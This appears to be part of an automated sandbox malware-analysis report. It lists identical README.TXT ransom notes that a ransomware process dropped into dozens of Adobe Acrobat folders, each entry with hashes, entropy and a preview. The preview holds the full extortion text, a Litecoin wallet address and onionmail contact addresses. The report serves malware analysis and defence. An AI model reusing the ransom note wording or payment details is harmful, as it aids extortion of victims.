                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\js\nls\he-il\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
